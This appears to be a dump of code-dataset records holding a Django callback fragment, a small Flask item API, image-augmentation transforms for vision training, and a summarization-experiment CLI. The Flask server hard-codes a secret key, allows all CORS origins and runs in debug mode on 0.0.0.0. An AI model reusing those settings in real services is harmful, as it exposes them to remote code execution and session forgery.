요청\n# def kakao_callback(request):\n# params = urllib.parse.urlencode(request.GET)\n# return redirect(f'http://127.0.0.1:8000/account/login/kakao/callback?{params}')", "sub_path": "ddabong/account/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.views.View", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "342669889", "text": "from flask import Flask, request, jsonify\nfrom model import AllItems, connect_to_db, db\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\napi = Api(app)\napp.debug = True\napp.config['SECRET_KEY'] = 'super-secret'\n\n###### made a ROUTE (actually gets that data for doing something with)\n###### 2 main methods: GET and POST (to/from server)\n######### (there's also DELETE and PUT, but POST does those too)\n######### defaults to GET... but better to always specify\n######### if you try to POST but don't say to, will get 405 error\n@app.route(\"/api/add-entry\", methods=['POST'])\n### ^^^ defines route name\n@cross_origin()\n#### ^^^ need this because 2 servers: front end and back end\ndef add_entry():\n data = request.get_json()\n ## ^^^ creates dictionary for incoming strings or whatnot\n item_name=data.get(\"itemName\")\n ## creates entery in dictionary {item_name, \"actual name\"}\n print(data)\n item_description=data.get(\"itemDescription\")\n new_entry=AllItems(item_name=item_name, item_description=item_description)\n db.session.add(new_entry)\n db.session.commit()\n print(\"everything but return...\")\n return \"Done added it yeah\"\n\n\n@app.route(\"/api/entries\", methods=['GET'])\n### ^^^ defines route name\n@cross_origin()\n#### ^^^ need this because 2 servers: front end and back end\ndef view_entries():\n q = request.args.get('q')\n print(q)\n entries = []\n if q:\n query_item = AllItems.query.filter(AllItems.item_name.like(f'%{q}%'))\n entries = query_item.all()\n else:\n entries = AllItems.query.all()\n #### ^^^ from class name in model.py, returns list of db objects\n list_of_json_objects_from_db = []\n for e in entries:\n dic_of_items = {\n \"formEntryID\": e.form_entry_id,\n \"date\": e.date,\n \"itemName\": e.item_name,\n \"itemDescription\": e.item_description\n } ### ^^^ these name strings are same as in db, but these are new!!!\n list_of_json_objects_from_db.append(dic_of_items)\n #### cycles through table, creating a dic for each row: \"columnName\", value\n ### .... and makes it not-quite-json....:\n return jsonify(list_of_json_objects_from_db)\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.jinja_env.auto_reload = app.debug\n connect_to_db(app)\n app.run(port=5000, host='0.0.0.0')\n", "sub_path": "server/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2462, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "model.AllItems", "line_number": 28, "usage_type": "call"}, {"api_name": "model.db.session.add", "line_number": 29, "usage_type": "call"}, {"api_name": "model.db.session", "line_number": 29, "usage_type": "attribute"}, {"api_name": "model.db", "line_number": 29, "usage_type": "name"}, {"api_name": "model.db.session.commit", "line_number": 30, "usage_type": "call"}, {"api_name": "model.db.session", "line_number": 30, "usage_type": "attribute"}, {"api_name": "model.db", "line_number": 30, "usage_type": "name"}, {"api_name": "flask_cors.cross_origin", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "model.AllItems.query.filter", "line_number": 44, "usage_type": "call"}, {"api_name": "model.AllItems.query", "line_number": 44, "usage_type": "attribute"}, {"api_name": "model.AllItems", "line_number": 44, "usage_type": "name"}, {"api_name": "model.AllItems.item_name.like", "line_number": 44, "usage_type": "call"}, {"api_name": "model.AllItems.item_name", "line_number": 44, "usage_type": "attribute"}, {"api_name": "model.AllItems.query.all", "line_number": 47, "usage_type": "call"}, {"api_name": "model.AllItems.query", "line_number": 47, "usage_type": "attribute"}, {"api_name": "model.AllItems", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 60, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 37, "usage_type": "call"}, {"api_name": "model.connect_to_db", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "260964203", "text": "import cv2\nimport numpy as np\nimport random\nimport copy\nimport math\nfrom scipy.stats import mode\nfrom math import fabs, sin, cos, radians\n\n#common 光学变换\nclass RandomSwapChannels(object):\n def __init__(self):\n self.swaps = ((0, 1, 2), (0, 2, 1),\n (1, 0, 2), (1, 2, 0),\n (2, 0, 1), (2, 1, 0))\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n index = random.randint(0, len(self.swaps) - 1)\n image = image[:, :, self.swaps[index]]\n return image, labels\n\nclass RandomContrast(object):\n def __init__(self, lower=0.5, upper=1.5):\n self.lower = lower\n self.upper = upper\n assert self.upper >= self.lower, \"contrast upper must be >= lower.\"\n assert self.lower >= 0, \"contrast lower must be non-negative.\"\n\n # expects float image\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n alpha = random.uniform(self.lower, self.upper)\n image = image.astype(np.float32) * alpha\n return image, labels\n\nclass RandomHSV(object):\n def __init__(self, hue=0.1, saturation=1.5, value=1.5):\n self.hue = hue\n self.saturation = saturation\n self.value = value\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n dh = random.uniform(-self.hue, self.hue)\n ds = random.uniform(1, self.saturation)\n if random.random() < 0.5:\n ds = 1 / ds\n dv = random.uniform(1, self.value)\n if random.random() < 0.5:\n dv = 1 / dv\n\n image = image.astype(np.float32) / 255.0\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n def wrap_hue(x):\n x[x >= 360.0] -= 360.0\n x[x < 0.0] += 360.0\n return x\n\n image[:, :, 0] = wrap_hue(image[:, :, 0] + (360.0 * dh))\n image[:, :, 1] = np.clip(ds * image[:, :, 1], 0.0, 1.0)\n image[:, :, 2] = np.clip(dv * image[:, :, 2], 0.0, 1.0)\n\n image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)\n image = (image * 255.0)\n return image, labels\n\n'''\nclass RandomBrightness(object):\n def __init__(self, delta=32):\n assert delta >= 0.0\n assert delta <= 255.0\n self.delta = delta\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n delta = random.uniform(-self.delta, self.delta)\n image += delta\n return image, labels\n'''\n\nclass RandomBrightness(object):\n def __init__(self, delta=220):\n assert delta >= 0.0\n assert delta <= 255.0\n self.delta = delta\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n old_tyupe = image.dtype\n image = image.astype(np.float32)\n delta = random.uniform(0, self.delta)\n image += delta\n image[image > 255] = 255\n image = image.astype(old_tyupe)\n return image, labels\n\nclass RandomSaltNoise(object):\n\n def __init__(self, max_noise_rate=0.1):\n self.max_noise_rate = max_noise_rate\n\n def __call__(self, img, labels=None):\n\n if random.randint(0, 1):\n noise_count = int(img.size * self.max_noise_rate)\n for k in range(noise_count):\n i = int(np.random.random() * img.shape[1])\n j = int(np.random.random() * img.shape[0])\n value = np.random.random() * 100\n if img.ndim == 2:\n img[j, i] = value\n elif img.ndim == 3:\n img[j, i, 0] = value\n img[j, i, 1] = value\n img[j, i, 2] = value\n\n return img, labels\n\nclass RgbToGray(object):\n def __init__(self):\n pass\n\n def __call__(self, img, labels=None):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY).astype(np.float32)\n img = img.reshape(img.shape[0], img.shape[1], 1)\n return img, labels\n\nclass NormalizeImage(object):\n def __init__(self, mean, std):\n self.mean = np.array(mean).astype(np.float32)\n self.std = np.array(std).astype(np.float32)\n pass\n\n def __call__(self, image, labels=None):\n image = image - self.mean\n image = image / self.std\n return image, labels\n\n\n#common 几何变换\nclass ResizeImage(object):\n def __init__(self, size):\n self.size = size\n\n def __call__(self, image, labels=None, resize=None):\n h, w = image.shape[:2]\n if resize is None:\n scale_h = self.size[1] / h\n scale_w = self.size[0] / w\n image = cv2.resize(image, tuple(self.size))\n else:\n scale_h = resize[1] / h\n scale_w = resize[0] / w\n image = cv2.resize(image, tuple(resize))\n\n if labels is not None and len(labels) > 0:\n labels[:, 0] = labels[:, 0] * scale_w\n labels[:, 1] = labels[:, 1] * scale_h\n labels[:, 2] = labels[:, 2] * scale_w\n labels[:, 3] = labels[:, 3] * scale_h\n\n return image, labels\n\n\nclass RandomResizePadding(object):\n \"\"\"随机缩放填充\n 先改变图像的宽高比,在填充,保证图像宽高比不变\n 改变图像主体内容的宽高比,而不改变图片的宽高比\n 输入opencv图像和非归一化xyxy坐标\n \"\"\"\n\n def __init__(self, stretch_list=[1.1, 1.2, 1.3, 1.4, 1.5], padding_value=[255, 255, 255]):\n self.stretch_list = stretch_list\n self.padding = padding_value\n\n def __call__(self, img, labels):\n if random.randint(0, 1):\n ratio = self.stretch_list[random.randint(0, len(self.stretch_list) - 1)]\n height = img.shape[0]\n widht = img.shape[1]\n\n # height < width\n if random.randint(0, 1):\n img = cv2.resize(img, (int(widht * ratio), height))\n det = int(((height * ratio) - height) / 2)\n img = cv2.copyMakeBorder(img, det, det, 0, 0, cv2.BORDER_CONSTANT, value=self.padding)\n if labels is not None and len(labels) > 0:\n labels[:, 1:4:2] += det\n labels[:, 0:3:2] = labels[:, 0:3:2].astype(np.float32) * ratio\n\n # height > width\n else:\n img = cv2.resize(img, (widht, int(height * ratio)))\n det = int(((widht * ratio) - widht) / 2)\n img = cv2.copyMakeBorder(img, 0, 0, det, det, cv2.BORDER_CONSTANT, value=self.padding)\n if labels is not None and len(labels) > 0:\n labels[:, 0:3:2] += det\n labels[:, 1:4:2] = labels[:, 1:4:2].astype(np.float32) * ratio\n\n return img, labels\n\nclass RandomCropFix(object):\n def __init__(self, size):\n self.size = size\n\n def __call__(self, image, labels=None):\n h, w = image.shape[:2]\n crop_w, crop_h = self.size\n if crop_w > w or crop_h > h:\n raise ValueError('RdndomCrop failed')\n h_offset = random.randint(0, h - crop_h)\n w_offset = random.randint(0, w - crop_w)\n image = image[h_offset:h_offset + crop_h, w_offset:w_offset + crop_w]\n\n if labels is not None and len(labels) > 0:\n labels[:, 0:3:2] -= w_offset\n labels[:, 1:4:2] -= h_offset\n labels[:, 0:3:2] = np.clip(labels[:, 0:3:2], 0, crop_w)\n labels[:, 1:4:2] = np.clip(labels[:, 1:4:2], 0, crop_h)\n\n return image, labels\n\nclass RandomCropRatio(object):\n def __init__(self, ratio):\n assert (ratio > 0 and ratio <= 1)\n self.ratio = ratio\n\n def __call__(self, image, labels=None):\n h, w = image.shape[:2]\n crop_w, crop_h = (int(float(w) * self.ratio), int(float(h) * self.ratio))\n if crop_w > w or crop_h > h:\n raise ValueError('RdndomCrop failed')\n h_offset = random.randint(0, h - crop_h)\n w_offset = random.randint(0, w - crop_w)\n image = image[h_offset:h_offset + crop_h, w_offset:w_offset + crop_w]\n\n if labels is not None and len(labels) > 0:\n labels[:, 0:3:2] -= w_offset\n labels[:, 1:4:2] -= h_offset\n labels[:, 0:3:2] = np.clip(labels[:, 0:3:2], 0, crop_w)\n labels[:, 1:4:2] = np.clip(labels[:, 1:4:2], 0, crop_h)\n\n return image, labels\n\nclass CenterCropFix(object):\n def __init__(self, size):\n self.size = size\n\n def __call__(self, image, labels=None):\n h, w = image.shape[:2]\n crop_w, crop_h = self.size\n if crop_w > w or crop_h > h:\n raise ValueError('RdndomCrop failed')\n h_offset = int((h - crop_h) / 2)\n w_offset = int((w - crop_w) / 2)\n image = image[h_offset:h_offset + crop_h, w_offset:w_offset + crop_w]\n\n if labels is not None and len(labels) > 0:\n labels[:, 0:3:2] -= w_offset\n labels[:, 1:4:2] -= h_offset\n labels[:, 0:3:2] = np.clip(labels[:, 0:3:2], 0, crop_w)\n labels[:, 1:4:2] = np.clip(labels[:, 1:4:2], 0, crop_h)\n\n return image, labels\n\nclass RandomHorizontalFlip(object):\n def __init__(self):\n pass\n\n def __call__(self, image, labels=None):\n if random.randint(0, 1):\n image = cv2.flip(image, 1)\n if labels is not None and len(labels) > 0:\n labels_old = copy.deepcopy(labels)\n h, w = image.shape[:2]\n labels[:, 0] = w - labels_old[:, 2]\n labels[:, 2] = w - labels_old[:, 0]\n pass\n return image, labels\n\nclass RandomExpand(object):\n def __init__(self, mean):\n self.mean = mean\n\n def __call__(self, image, labels):\n if random.randint(0, 1):\n height, width, depth = image.shape\n ratio = random.uniform(1, 3)\n left = random.uniform(0, width * ratio - width)\n top = random.uniform(0, height * ratio - height)\n\n expand_image = np.zeros(\n (int(height * ratio), int(width * ratio), depth),\n dtype=image.dtype)\n expand_image[:, :, :] = self.mean\n expand_image[int(top):int(top + height),\n int(left):int(left + width)] = image\n image = expand_image\n\n if labels is not None and len(labels) > 0:\n labels[:, 0] += int(left)\n labels[:, 1] += int(top)\n labels[:, 2] += int(left)\n labels[:, 3] += int(top)\n return image, labels\n\n# just for cls\n\nclass ClsRandomPaddingWidth(object):\n def __init__(self, min_ratio=-0.3, max_ratio=0.3):\n self.min_ratio = min_ratio\n self.max_ratio = max_ratio\n\n def __call__(self, image, labels):\n height, width, depth = image.shape\n ratio = random.uniform(self.min_ratio, self.max_ratio)\n\n if ratio < 0:\n w_start = int(width * (-ratio) / 2)\n w_stop = int(width - width * (-ratio) / 2)\n return image[:, w_start:w_stop, :], labels\n else:\n det = int(width * (ratio) / 2)\n img = cv2.copyMakeBorder(image, 0, 0, det, det, cv2.BORDER_CONSTANT, value=(255, 255, 255))\n return img, labels\n\nclass ClsRandomRotate(object):\n \"\"\"随机旋转(只针对图像分类)\n 输入opencv图像\n \"\"\"\n\n def __init__(self, max_degree=45, filled_color=-1):\n self.max_degree = max_degree\n self.filled_color = filled_color\n\n def __call__(self, img, labels=None):\n\n if random.randint(0, 1):\n self.degree = random.randint(-self.max_degree, self.max_degree)\n # 获取旋转后4角的填充色\n if self.filled_color == -1:\n self.filled_color = mode([img[0, 0], img[0, -1],\n img[-1, 0], img[-1, -1]]).mode[0]\n if np.array(self.filled_color).shape[0] == 2:\n if isinstance(self.filled_color, int):\n self.filled_color = (self.filled_color, self.filled_color, self.filled_color)\n else:\n self.filled_color = tuple([int(i) for i in self.filled_color])\n\n height, width = img.shape[:2]\n\n # 旋转后的尺寸\n height_new = int(width * fabs(sin(radians(self.degree))) +\n height * fabs(cos(radians(self.degree))))\n width_new = int(height * fabs(sin(radians(self.degree))) +\n width * fabs(cos(radians(self.degree))))\n\n mat_rotation = cv2.getRotationMatrix2D((width / 2, height / 2), self.degree, 1)\n\n mat_rotation[0, 2] += (width_new - width) / 2\n mat_rotation[1, 2] += (height_new - height) / 2\n\n # Pay attention to the type of elements of filler_color, which should be\n # the int in pure python, instead of those in numpy.\n img = cv2.warpAffine(img, mat_rotation, (width_new, height_new),\n borderValue=self.filled_color)\n # 填充四个角\n mask = np.zeros((height_new + 2, width_new + 2), np.uint8)\n mask[:] = 0\n seed_points = [(0, 0), (0, height_new - 1), (width_new - 1, 0),\n (width_new - 1, height_new - 1)]\n for i in seed_points:\n cv2.floodFill(img, mask, i, self.filled_color)\n\n return img, labels\n\nclass ClsRandomRotate180(object):\n def __init__(self):\n pass\n def __call__(self, img, labels=None):\n img = cv2.flip(img, 0)\n img = cv2.flip(img, 1)\n return img, labels\n\nclass ClsAffine(object):\n def __init__(self):\n pass\n def __call__(self, image, labels):\n if random.randint(0, 1):\n height, width, depth = image.shape\n ratio_h = random.uniform(-0.08, +0.08)\n ratio_w = random.uniform(-0.08, +0.08)\n matSrc = np.float32([[0,0],[0,height-1],[width-1,0]])\n matDst = np.float32([[ratio_h*height, ratio_w*width],[0,height+1],[width+1,0]])\n matAffine = cv2.getAffineTransform(matSrc,matDst)\n dst = cv2.warpAffine(image,matAffine,(width,height), borderValue=(255,255,255))\n return dst, labels\n else:\n return image, labels\n\n\n\n# just for det\nclass DetIgnoreBoxes(object):\n def __init__(self, min_area=0, ignore_class=[]):\n self.min_area = min_area\n self.ignore_class = ignore_class\n def __call__(self, image, labels):\n ignore_indexs = []\n if self.min_area > 0:\n assert(labels is not None)\n for i,label in enumerate(labels):\n if int(label[4]) in self.ignore_class or \\\n (label[2]-label[0])*(label[3]-label[1]) < self.min_area:\n ignore_indexs.append(i)\n if len(ignore_indexs) > 0:\n #print('*** ignore %d boxes'%(len(ignore_indexs)))\n labels = np.delete(labels, ignore_indexs, axis = 0)\n\n return image, labels", "sub_path": "Trainer/DLEngine/modules/dataloader/transform.py", "file_name": "transform.py", "file_ext": "py", "file_size_in_byte": 15045, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "random.randint", "line_number": 17, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 33, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 44, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 45, "usage_type": "call"}, {"api_name": "random.random", "line_number": 46, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 48, "usage_type": "call"}, {"api_name": "random.random", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2BGR", "line_number": 64, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 91, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 155, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 178, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 179, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.copyMakeBorder", "line_number": 187, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 190, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 194, "usage_type": "call"}, {"api_name": "cv2.copyMakeBorder", "line_number": 196, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 196, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 199, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 212, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 220, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 234, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 263, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 272, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 273, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 275, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 287, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 289, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 290, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 293, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 317, "usage_type": "call"}, {"api_name": "cv2.copyMakeBorder", "line_number": 325, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 325, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 339, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 340, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 345, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 354, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 354, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 354, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 355, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 355, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 355, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 356, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 356, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 356, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 357, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 357, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 357, "usage_type": "call"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 359, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 369, "usage_type": "attribute"}, {"api_name": "cv2.floodFill", "line_number": 374, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 382, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 383, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 390, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 392, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 395, "usage_type": "call"}, {"api_name": "cv2.getAffineTransform", "line_number": 396, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 419, "usage_type": "call"}]} +{"seq_id": "286952959", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"Conduct experiments using sume.\"\"\"\n\n\nimport argparse\nimport datetime\nimport json\nimport logging\nimport logging.config\nimport multiprocessing\nimport os\nimport pathlib\nimport queue\n\nimport fastText\nimport nltk\nimport numpy\nimport spacy\nimport yaml\n\nfrom . import inputs\nfrom . import summarizers\nfrom . import rouge\n\n# from sume.models.entropy_summarizer import EntropySummarizer\nlogger = logging.getLogger(__name__)\n\n\ndef setup_logging(default_path: str = 'logging.yml',\n default_level: int = logging.INFO,\n env_key: str = 'LOG_CFG') -> None:\n \"\"\"Configure logging.\"\"\"\n path = default_path\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(path):\n with open(path, 'r') as fh:\n config = yaml.safe_load(fh.read())\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n\n\ndef main() -> None:\n \"\"\"CLI Entry point.\"\"\"\n\n # setup logging\n setup_logging()\n\n # define the CLI\n parser = argparse.ArgumentParser(description='Experiment with sume.')\n parser.add_argument(\n 'method',\n choices=['dwmd', 'wwmd', 'ilp'],\n help='which method to summarize with')\n parser.add_argument(\n '--model',\n default='models/duc.bin',\n help='which fasttext model to use')\n parser.add_argument(\n '--workers',\n type=int,\n default=multiprocessing.cpu_count(),\n help='number of cores to use')\n args = parser.parse_args()\n data_dir = os.path.join('data', 'duc2004')\n run_name_suffix = '-' + datetime.datetime.now() \\\n .strftime('%m-%dT%H:%M:%S')\n run_name = args.method + run_name_suffix\n output_dir = os.path.join('output', run_name)\n models_dir = os.path.join(data_dir, 'models')\n system_peers_dir = os.path.join(data_dir, 'sys-peers')\n documents_dir = os.path.join(data_dir, 'documents')\n peers_dir = os.path.join(output_dir, 'peers')\n rouge_config = os.path.join(output_dir, 'rouge-config.xml')\n\n rouge_err = os.path.join(output_dir, 'rouge.err')\n rouge_data = os.path.join('rouge', 'data')\n rouge_args = ['-n', '4',\n '-m',\n '-l', '100',\n '-x',\n '-c', '95',\n '-r', '1000',\n '-f', 'A',\n '-p', '0.5',\n '-t', '0',\n '-d']\n output_file = os.path.join(output_dir, 'results.json')\n\n # download required spacy models and nltk corpora if they are not present\n spacy.cli.download('en_core_web_sm')\n nltk.download('stopwords')\n\n # setup output directory\n pathlib.Path(peers_dir).mkdir(parents=True, exist_ok=True)\n\n data = inputs.get_duc_input(documents_dir,\n models_dir,\n system_peers_dir)\n\n if args.method in ['dwmd', 'wwmd']:\n model = fastText.load_model(args.model)\n\n def embeddings(word: str) -> numpy.ndarray:\n return model.get_word_vector(word)\n\n if args.method == 'dwmd':\n wrapper = summarizers.WMDWrapper(embeddings, '.tokens')\n elif args.method == 'wwmd':\n wrapper = summarizers.WMDWeightsWrapper(embeddings, '.tokens')\n\n elif args.method == 'ilp':\n nltk.download('stopwords')\n wrapper = summarizers.ILPWrapper('.tokens', n=2, stemming=True,\n mininum_sentence_length=2,\n remove_citations=True,\n remove_redundancy=True)\n tasks = multiprocessing.Queue()\n for id, (documents, _, _) in data.items():\n tasks.put((id, documents))\n workers = [Worker(wrapper, tasks, peers_dir, logger)\n for _ in range(args.workers)]\n for worker in workers:\n worker.start()\n for worker in workers:\n worker.join()\n\n rouge.write_config(data,\n peers_dir,\n rouge_config)\n rouge.run(os.path.join('rouge', 'ROUGE-1.5.5.pl'),\n rouge_data,\n rouge_args,\n rouge_config,\n os.path.join(output_dir, 'rouge.out'),\n rouge_err)\n results = rouge.parse(os.path.join(output_dir, 'rouge.out'))\n with open(output_file, 'w', encoding='utf-8') as fh:\n json.dump(results, fh)\n logger.info('average ROUGE-2 recall is {:.3f} ({:.3f}, {:.3f})'.format(\n *results['R']['2']))\n\n\nclass Worker(multiprocessing.Process):\n\n def __init__(self, wrapper: summarizers.SummarizerWrapper,\n tasks: multiprocessing.Queue, peers_dir: str,\n logger: logging.Logger) -> None:\n super().__init__()\n self.wrapper = wrapper\n self.tasks = tasks\n self.peers_dir = peers_dir\n self.logger = logger\n\n def run(self) -> None:\n while True:\n try:\n task = self.tasks.get_nowait()\n except queue.Empty:\n break\n id, documents = task\n\n self.logger.info('processing directory {}'.format(documents))\n summary = self.wrapper.summarize(documents)\n summarizers.write_summary(self.peers_dir, id, summary)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "sumexp/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 5372, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.config.dictConfig", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 43, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 53, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": 